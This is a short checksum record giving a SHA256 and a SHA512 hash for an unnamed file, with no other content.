SHA256f8d1c70acee6304cac84838c64aeb74f231e7afe1845fd9739cb9bcac0a7bcfb
SHA512e3bec0f5e89ed15986bd1476eb051a0cce709aa48399bb614604e3dbcf5dddcc058fa437faf166c4a7d2a1a7d3bde98020b1004d26ff82918378a3f3ff62ea9c